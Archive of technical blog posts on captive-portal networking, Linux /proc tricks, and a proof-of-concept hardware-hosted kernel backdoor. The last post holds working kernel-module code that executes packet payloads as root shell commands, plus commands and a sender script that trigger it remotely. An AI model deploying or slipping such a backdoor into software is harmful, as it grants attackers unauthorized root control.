Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?

wireless coffee

You pull out your laptop and type http://www.google.com into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DHCP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing, among other things, what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:

DHCP

Step 1: DHCP discovery. The DHCP client (us, 0.0.0.0 in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address 255.255.255.255). The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e (Wireshark shows IP address 192.168.5.1) answers our discovery broadcast.

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address (192.168.5.87) and know the IP address of our gateway router (192.168.5.1):

DHCP lease
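
For the curious, the discovery step is simple enough to build by hand. Here's a minimal Python 3 sketch of a DHCPDISCOVER -- it assumes a Linux box, root privileges to bind the DHCP client port (68), and that no other DHCP client is already bound to it:

#!/usr/bin/env python3
# Build and broadcast a DHCPDISCOVER by hand. Needs root to bind the
# DHCP client port, and any running DHCP client should be stopped first.
import os
import socket
import struct

mac = bytes.fromhex("00236c8f953f")       # the laptop's MAC from the capture
xid = os.urandom(4)                       # random transaction ID

# Fixed-format BOOTP header: op=1 (request), htype=1 (Ethernet), hlen=6, hops=0
packet  = struct.pack("!BBBB", 1, 1, 6, 0)
packet += xid
packet += struct.pack("!HH", 0, 0x8000)   # secs, flags (broadcast bit set)
packet += b"\x00" * 16                    # ciaddr, yiaddr, siaddr, giaddr
packet += mac + b"\x00" * 10              # chaddr, padded to 16 bytes
packet += b"\x00" * 192                   # sname + file, unused
packet += b"\x63\x82\x53\x63"             # DHCP magic cookie

# Options: message type 53 = DISCOVER(1), then a small parameter request
# list (a subset of what dhclient asks for: subnet mask, router, DNS,
# domain name, broadcast address), then the end option.
params  = bytes([1, 3, 6, 15, 28])
packet += bytes([53, 1, 1])
packet += bytes([55, len(params)]) + params
packet += bytes([255])

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.bind(("", 68))                       # DHCP client port
sock.sendto(packet, ("255.255.255.255", 67))
print("DHCPDISCOVER sent, %d bytes" % len(packet))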

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:

ARP

Before offering us IP address 192.168.5.87, the DHCP server (Portwell_17:ca:4e) sends an ARP request for that address, saying "Who has 192.168.5.87? If that's you, respond with your MAC address." Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After getting assigned IP address 192.168.5.87, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address for our gateway router: 192.168.5.1. Our DHCP server happens to also be our gateway router and responds claiming the address.
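
The ARP cache that all of this populates is easy to inspect. On Linux it lives at /proc/net/arp; a few lines of Python (a quick sketch, nothing more) will dump the current IP-to-MAC mappings:

#!/usr/bin/env python3
# Dump the kernel's ARP cache, roughly what `arp -a` shows.
# /proc/net/arp has a header line, then one entry per line:
# IP address, HW type, flags, HW address, mask, device.
with open("/proc/net/arp") as f:
    next(f)                                   # skip the header line
    for line in f:
        fields = line.split()
        ip, mac, dev = fields[0], fields[3], fields[5]
        print("%-15s %-17s %s" % (ip, mac, dev))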

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type http://www.google.com into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

DNS resolution

Looking back at the DHCP acknowledgment, as part of the lease we were given a domain name: sbx07338.cambrma.wayport.net. Since www.google.com might not be fully-qualified, our local DNS resolver first appends the domain name from the DHCP lease to it (e.g. www.google.com.sbx07338.cambrma.wayport.net in the first iteration) and tries to resolve that. When that resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and only then resolves plain old www.google.com. This works, and we get back IP address 173.194.35.104. A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois 173.194.35.104
NetRange:       173.194.0.0 - 173.194.255.255
CIDR:           173.194.0.0/16
OriginAS:       AS15169
NetName:        GOOGLE
...
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
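
As an aside, the resolver's search-list behavior is easy to mimic. Here's a rough sketch, using just the Python standard library, of the candidate names a resolver configured with that DHCP-supplied domain would walk through (the candidate list follows the behavior described above; real resolvers differ in the details):

#!/usr/bin/env python3
# Mimic the resolver's search list: try the name with decreasingly
# specific suffixes of the DHCP-supplied domain, then the bare name.
import socket

name = "www.google.com"
search_domain = "sbx07338.cambrma.wayport.net"

labels = search_domain.split(".")
candidates = [name + "." + ".".join(labels[i:])
              for i in range(len(labels) - 1)]   # keep at least two labels
candidates.append(name)

for candidate in candidates:
    try:
        addr = socket.gethostbyname(candidate)
    except socket.gaierror:
        print("%-50s no such host" % candidate)
    else:
        print("%-50s %s" % (candidate, addr))
        break
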
We complete a TCP handshake with 173.194.35.104 and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to http://nmd.sbx07338.cambrma.wayport.net/index.adp?MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87&vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196&UserAgent=&ProxyHost=:

TCP handshake + HTTP

Our MAC address and IP address are conveniently encoded in the redirect URL.

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router, 192.168.5.1, is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.


Let's dwell on this for a moment, because it's kind of amazing that the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of www.google.com, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use point-to-point encryption: HTTPS, SSH, your favorite IPSec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.
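
This hijacking is, incidentally, roughly how captive-portal detection works: fetch a URL whose response you already know and see whether something in the path rewrote or redirected it. A minimal sketch, with an illustrative probe URL rather than any particular vendor's:

#!/usr/bin/env python3
# Sketch of captive-portal detection: fetch a page we know and see
# whether something in the path redirected us somewhere else.
# (A transparent proxy that serves a clone without redirecting would
# require comparing the response body as well.)
import urllib.request

probe_url = "http://example.com/"             # illustrative probe URL

with urllib.request.urlopen(probe_url, timeout=5) as resp:
    if resp.geturl() != probe_url:
        print("redirected to %s -- looks like a captive portal" % resp.geturl())
    else:
        print("reached %s directly -- no obvious interception" % probe_url)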


Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect (nmd.sbx07338.cambrma.wayport.net) and make our request there:

DNS 98.98.48.198

nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get IP address 98.98.48.198. This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:

get to starbucks.yahoo.com

Step 4: Get to Google

Having agreed to the terms of service, 98.98.48.198 communicates to our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore -- our HTTP packets should be allowed out onto the Internet.

98.98.48.198 responds to our POST with a final HTTP 302 redirect, this time to starbucks.yahoo.com. We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to http://www.google.com.

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.

 ~jesstess

Monday Jan 10, 2011

Solving problems with proc

The Linux kernel exposes a wealth of information through the proc special filesystem. It's not hard to find an encyclopedic reference about proc. In this article I'll take a different approach: we'll see how proc tricks can solve a number of real-world problems. All of these tricks should work on a recent Linux kernel, though some will fail on older systems like RHEL version 4.

Almost all Linux systems will have the proc filesystem mounted at /proc. If you look inside this directory you'll see a ton of stuff:

keegan@lyle$ mount | grep ^proc
proc on /proc type proc (rw,noexec,nosuid,nodev)
keegan@lyle$ ls /proc
1      13     23     29672  462        cmdline      kcore         self
10411  13112  23842  29813  5          cpuinfo      keys          slabinfo
...
12934  15260  26317  4      bus        irq          partitions    zoneinfo
12938  15262  26349  413    cgroups    kallsyms     sched_debug

These directories and files don't exist anywhere on disk. Rather, the kernel generates the contents of /proc as you read it. proc is a great example of the UNIX "everything is a file" philosophy. Since the Linux kernel exposes its internal state as a set of ordinary files, you can build tools using basic shell scripting, or any other programming environment you like. You can also change kernel behavior by writing to certain files in /proc, though we won't discuss this further.
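
For example, reading kernel state from a program is no different from reading any other file. A quick Python sketch that pulls a couple of fields out of /proc/meminfo:

#!/usr/bin/env python3
# proc is just files: pull a couple of fields out of /proc/meminfo.
meminfo = {}
with open("/proc/meminfo") as f:
    for line in f:
        key, value = line.split(":", 1)
        meminfo[key] = value.strip()          # e.g. "16418208 kB"

print("MemTotal: %s" % meminfo["MemTotal"])
print("MemFree:  %s" % meminfo["MemFree"])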

Each process has a directory in /proc, named by its numerical process identifier (PID). So for example, information about init (PID 1) is stored in /proc/1. There's also a symlink /proc/self, which each process sees as pointing to its own directory:

keegan@lyle$ ls -l /proc/self
lrwxrwxrwx 1 root root 64 Jan 6 13:22 /proc/self -> 13833

Here we see that 13833 was the PID of the ls process. Since ls has exited, the directory /proc/13833 will have already vanished, unless your system reused the PID for another process. The contents of /proc are constantly changing, even in response to your queries!

Back from the dead

It's happened to all of us. You hit the up-arrow one too many times and accidentally wiped out that really important disk image.

keegan@lyle$ rm hda.img

Time to think fast! Luckily you were still computing its checksum in another terminal. And UNIX systems won't actually delete a file on disk while the file is in use. Let's make sure our file stays "in use" by suspending md5sum with control-Z:

keegan@lyle$ md5sum hda.img
^Z
[1]+  Stopped                 md5sum hda.img

The proc filesystem contains links to a process's open files, under the fd subdirectory. We'll get the PID of md5sum and try to recover our file:

keegan@lyle$ jobs -l
[1]+ 14595 Stopped                 md5sum hda.img
keegan@lyle$ ls -l /proc/14595/fd/
total 0
lrwx------ 1 keegan keegan 64 Jan 6 15:05 0 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 1 -> /dev/pts/18
lrwx------ 1 keegan keegan 64 Jan 6 15:05 2 -> /dev/pts/18
lr-x------ 1 keegan keegan 64 Jan 6 15:05 3 -> /home/keegan/hda.img (deleted)
keegan@lyle$ cp /proc/14595/fd/3 saved.img
keegan@lyle$ du -h saved.img
320G    saved.img

Disaster averted, thanks to proc. There's one big caveat: making a full byte-for-byte copy of the file could require a lot of time and free disk space. In theory this isn't necessary; the file still exists on disk, and we just need to make a new name for it (a hardlink). But the ln command and associated system calls have no way to name a deleted file. On FreeBSD we could use fsdb, but I'm not aware of a similar tool for Linux. Suggestions are welcome!

Redirect harder

Most UNIX tools can read from standard input, either by default or with a specified filename of "-". But sometimes we have to use a program which requires an explicitly named file. proc provides an elegant workaround for this flaw.

A UNIX process refers to its open files using integers called file descriptors. When we say "standard input", we really mean "file descriptor 0". So we can use /proc/self/fd/0 as an explicit name for standard input:

keegan@lyle$ cat crap-prog.py 
import sys
print file(sys.argv[1]).read()
keegan@lyle$ echo hello | python crap-prog.py 
IndexError: list index out of range
keegan@lyle$ echo hello | python crap-prog.py -
IOError: [Errno 2] No such file or directory: '-'
keegan@lyle$ echo hello | python crap-prog.py /proc/self/fd/0
hello

This also works for standard output and standard error, on file descriptors 1 and 2 respectively. This trick is useful enough that many distributions provide symlinks at /dev/stdin, etc.

There are a lot of possibilities for where /proc/self/fd/0 might point:

keegan@lyle$ ls -l /proc/self/fd/0
lrwx------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/pts/6
keegan@lyle$ ls -l /proc/self/fd/0 < /dev/null
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> /dev/null
keegan@lyle$ echo | ls -l /proc/self/fd/0
lr-x------ 1 keegan keegan 64 Jan  6 16:00 /proc/self/fd/0 -> pipe:[9159930]

In the first case, stdin is the pseudo-terminal created by my screen session. In the second case it's redirected from a different file. In the third case, stdin is an anonymous pipe. The symlink target isn't a real filename, but proc provides the appropriate magic so that we can read the file anyway. The filesystem nodes for anonymous pipes live in the pipefs special filesystem — specialer than proc, because it can't even be mounted.

The phantom progress bar

Say we have some program which is slowly working its way through an input file. We'd like a progress bar, but we already launched the program, so it's too late for pv.

Alongside /proc/$PID/fd we have /proc/$PID/fdinfo, which will tell us (among other things) a process's current position within an open file. Let's use this to make a little script that will attach a progress bar to an existing process:

keegan@lyle$ cat phantom-progress.bash
#!/bin/bash
fd=/proc/$1/fd/$2
fdinfo=/proc/$1/fdinfo/$2
name=$(readlink $fd)
size=$(wc -c $fd | awk '{print $1}')
while [ -e $fd ]; do
  progress=$(cat $fdinfo | grep ^pos | awk '{print $2}')
  echo $((100*$progress / $size))
  sleep 1
done | dialog --gauge "Progress reading $name" 7 100

We pass the PID and a file descriptor as arguments. Let's test it:

keegan@lyle$ cat slow-reader.py 
import sys
import time
f = file(sys.argv[1], 'r')
while f.read(1024):
  time.sleep(0.01)
keegan@lyle$ python slow-reader.py bigfile &
[1] 18589
keegan@lyle$ ls -l /proc/18589/fd
total 0
lrwx------ 1 keegan keegan 64 Jan  6 16:40 0 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 1 -> /dev/pts/16
lrwx------ 1 keegan keegan 64 Jan  6 16:40 2 -> /dev/pts/16
lr-x------ 1 keegan keegan 64 Jan  6 16:40 3 -> /home/keegan/bigfile
keegan@lyle$ ./phantom-progress.bash 18589 3

And you should see a nice curses progress bar, courtesy of dialog. Or replace dialog with gdialog and you'll get a GTK+ window.

Chasing plugins

A user comes to you with a problem: every so often, their instance of Enterprise FooServer will crash and burn. You read up on Enterprise FooServer and discover that it's a plugin-riddled behemoth, loading dozens of shared libraries at startup. Loading the wrong library could very well cause mysterious crashing.

The exact set of libraries loaded will depend on the user's config files, as well as environment variables like LD_PRELOAD and LD_LIBRARY_PATH. So you ask the user to start fooserver exactly as they normally do. You get the process's PID and dump its memory map:

keegan@lyle$ cat /proc/21637/maps
00400000-00401000 r-xp 00000000 fe:02 475918             /usr/bin/fooserver
00600000-00601000 rw-p 00000000 fe:02 475918             /usr/bin/fooserver
02519000-0253a000 rw-p 00000000 00:00 0                  [heap]
7ffa5d3c5000-7ffa5d3c6000 r-xp 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d3c6000-7ffa5d5c5000 ---p 00001000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c5000-7ffa5d5c6000 rw-p 00000000 fe:02 1286241    /usr/lib/foo-1.2/libplugin-bar.so
7ffa5d5c6000-7ffa5d5c7000 r-xp 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d5c7000-7ffa5d7c6000 ---p 00001000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c6000-7ffa5d7c7000 rw-p 00000000 fe:02 1286243    /usr/lib/foo-1.3/libplugin-quux.so
7ffa5d7c7000-7ffa5d91f000 r-xp 00000000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5d91f000-7ffa5db1e000 ---p 00158000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db1e000-7ffa5db22000 r--p 00157000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db22000-7ffa5db23000 rw-p 0015b000 fe:02 4055115    /lib/libc-2.11.2.so
7ffa5db23000-7ffa5db28000 rw-p 00000000 00:00 0 
7ffa5db28000-7ffa5db2a000 r-xp 00000000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5db2a000-7ffa5dd2a000 ---p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2a000-7ffa5dd2b000 r--p 00002000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2b000-7ffa5dd2c000 rw-p 00003000 fe:02 4055114    /lib/libdl-2.11.2.so
7ffa5dd2c000-7ffa5dd4a000 r-xp 00000000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df26000-7ffa5df29000 rw-p 00000000 00:00 0 
7ffa5df46000-7ffa5df49000 rw-p 00000000 00:00 0 
7ffa5df49000-7ffa5df4a000 r--p 0001d000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4a000-7ffa5df4b000 rw-p 0001e000 fe:02 4055128    /lib/ld-2.11.2.so
7ffa5df4b000-7ffa5df4c000 rw-p 00000000 00:00 0 
7fffedc07000-7fffedc1c000 rw-p 00000000 00:00 0          [stack]
7fffedcdd000-7fffedcde000 r-xp 00000000 00:00 0          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]

That's a serious red flag: fooserver is loading the bar plugin from FooServer version 1.2 and the quux plugin from FooServer version 1.3. If the versions aren't binary-compatible, that might explain the mysterious crashes. You can now hassle the user for their config files and try to fix the problem.
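
A short script can do that scan for you. Here's a sketch (a hypothetical helper, not part of FooServer) that prints the distinct files mapped into a process, so a version mismatch like the one above jumps out:

#!/usr/bin/env python3
# List the distinct files mapped into a process, from /proc/PID/maps.
# Usage: ./list-maps.py <pid>
import sys

pid = sys.argv[1]
mapped = set()
with open("/proc/%s/maps" % pid) as f:
    for line in f:
        fields = line.split()
        # The pathname is the optional sixth field; anonymous mappings
        # and pseudo-paths like [heap] don't start with a slash.
        if len(fields) >= 6 and fields[5].startswith("/"):
            mapped.add(fields[5])

for path in sorted(mapped):
    print(path)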

Just for fun, let's take a closer look at what the memory map means. Right away, we can recognize a memory address range (first column), a filename (last column), and file-like permission bits rwx. So each line indicates that the contents of a particular file are available to the process at a particular range of addresses with a particular set of permissions. For more details, see the proc manpage.

The executable itself is mapped twice: once for executing code, and once for reading and writing data. The same is true of the shared libraries. The flag p indicates a private mapping: changes to this memory area will not be shared with other processes, or saved to disk. We certainly don't want the global variables in a shared library to be shared by every process which loads that library. If you're wondering, as I was, why some library mappings have no access permissions, see this glibc source comment. There are also a number of "anonymous" mappings lacking filenames; these exist in memory only. An allocator like malloc can ask the kernel for such a mapping, then parcel out this storage as the application requests it.

The last two entries are special creatures which aim to reduce system call overhead. At boot time, the kernel will determine the fastest way to make a system call on your particular CPU model. It builds this instruction sequence into a little shared library in memory, and provides this virtual dynamic shared object (named vdso) for use by userspace code. Even so, the overhead of switching to the kernel context should be avoided when possible. Certain system calls such as gettimeofday are merely reading information maintained by the kernel. The kernel will store this information in the public virtual system call page (named vsyscall), so that these "system calls" can be implemented entirely in userspace.

Counting interruptions

We have a process which is taking a long time to run. How can we tell if it's CPU-bound or IO-bound?

When a process makes a system call, the kernel might let a different process run for a while before servicing the request. This voluntary context switch is especially likely if the system call requires waiting for some resource or event. If a process is only doing pure computation, it's not making any system calls. In that case, the kernel uses a hardware timer interrupt to eventually perform a nonvoluntary context switch.

The file /proc/$PID/status has fields labeled voluntary_ctxt_switches and nonvoluntary_ctxt_switches showing how many of each event have occurred. Let's try our slow reader process from before:

keegan@lyle$ python slow-reader.py bigfile &
[1] 15264
keegan@lyle$ watch -d -n 1 'cat /proc/15264/status | grep ctxt_switches'

You should see mostly voluntary context switches. Our program calls into the kernel in order to read or sleep, and the kernel can decide to let another process run for a while. We could use strace to see the individual calls. Now let's try a tight computational loop:

keegan@lyle$ cat tightloop.c
int main() {
  while (1) {
  }
}
keegan@lyle$ gcc -Wall -o tightloop tightloop.c
keegan@lyle$ ./tightloop &
[1] 30086
keegan@lyle$ watch -d -n 1 'cat /proc/30086/status | grep ctxt_switches'

You'll see exclusively nonvoluntary context switches. This program isn't making system calls; it just spins the CPU until the kernel decides to let someone else have a turn. Don't forget to kill this useless process!

Staying ahead of the OOM killer

The Linux memory subsystem has a nasty habit of making promises it can't keep. A userspace program can successfully allocate as much memory as it likes. The kernel will only look for free space in physical memory once the program actually writes to the addresses it allocated. And if the kernel can't find enough space, a component called the OOM killer will use an ad-hoc heuristic to choose a victim process and unceremoniously kill it.

Needless to say, this feature is controversial. The kernel has no reliable idea of who's actually responsible for consuming the machine's memory. The victim process may be totally innocent. You can disable memory overcommitting on your own machine, but there's inherent risk in breaking assumptions that processes make — even when those assumptions are harmful.

As a less drastic step, let's keep an eye on the OOM killer so we can predict where it might strike next. The victim process will be the process with the highest "OOM score", which we can read from /proc/$PID/oom_score:

keegan@lyle$ cat oom-scores.bash
#!/bin/bash
for procdir in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+'); do
  printf "%10d %6d %s\n" \
    "$(cat $procdir/oom_score)" \
    "$(basename $procdir)" \
    "$(cat $procdir/cmdline | tr '\0' ' ' | head -c 100)"
done 2>/dev/null | sort -nr | head -n 20

For each process we print the OOM score, the PID (obtained from the directory name) and the process's command line. proc provides string arrays in NULL-delimited format, which we convert using tr. It's important to suppress error output using 2>/dev/null because some of the processes found by find (including find itself) will no longer exist within the loop. Let's see the results:

keegan@lyle$ ./oom-scores.bash 
  13647872  15439 /usr/lib/chromium-browser/chromium-browser --type=plugin
   1516288  15430 /usr/lib/chromium-browser/chromium-browser --type=gpu-process
   1006592  13204 /usr/lib/nspluginwrapper/i386/linux/npviewer.bin --plugin
    687581  15264 /usr/lib/chromium-browser/chromium-browser --type=zygote
    445352  14323 /usr/lib/chromium-browser/chromium-browser --type=renderer
    444930  11255 /usr/lib/chromium-browser/chromium-browser --type=renderer
...

Unsurprisingly, my web browser and Flash plugin are prime targets for the OOM killer. But the rankings might change if some runaway process caused an actual out-of-memory condition. Let's (carefully!) run a program that will (slowly!) eat 500 MB of RAM:

keegan@lyle$ cat oomnomnom.c
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#define SIZE (10*1024*1024)

int main() {
  int i;
  for (i=0; i<50; i++) {
    void *m = mmap(NULL, SIZE, PROT_WRITE,
      MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    memset(m, 0x80, SIZE);
    sleep(1);
  }
  return 0;
}

On each loop iteration, we ask for 10 megabytes of memory as a private, anonymous (non-file-backed) mapping. We then write to this region, so that the kernel will have to allocate some physical RAM. Now we'll watch OOM scores and free memory as this program runs:

keegan@lyle$ gcc -Wall -o oomnomnom oomnomnom.c
keegan@lyle$ ./oomnomnom &
[1] 19697
keegan@lyle$ watch -d -n 1 './oom-scores.bash; echo; free -m'

You'll see oomnomnom climb to the top of the list.

So we've seen a few ways that proc can help us solve problems. Actually, we've only scratched the surface. Inside each process's directory you'll find information about resource limits, chroots, CPU affinity, page faults, and much more. What are your favorite proc tricks? Let us know in the comments!

~keegan

Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};
	
	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	
	kfree_skb(skb);
	return 0;
}
We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1
};

int init_module(void)
{
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
}
Let's build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.
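
If you don't have sendip handy, a raw socket can do the same job. A short Python sketch (run as root; the protocol number and NUL-terminated payload match what exec_packet expects):

#!/usr/bin/env python3
# Send an IP packet with protocol number 163 whose payload is a shell
# command. Needs root for the raw socket; since IP_HDRINCL is left
# unset, the kernel builds the IP header (with protocol 163) for us.
import socket
import sys

target = sys.argv[1]                      # the target machine's IP address
command = b"touch /tmp/x\x00"             # NUL-terminated, as exec_packet expects

sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, 163)
sock.sendto(command, (target, 0))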

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

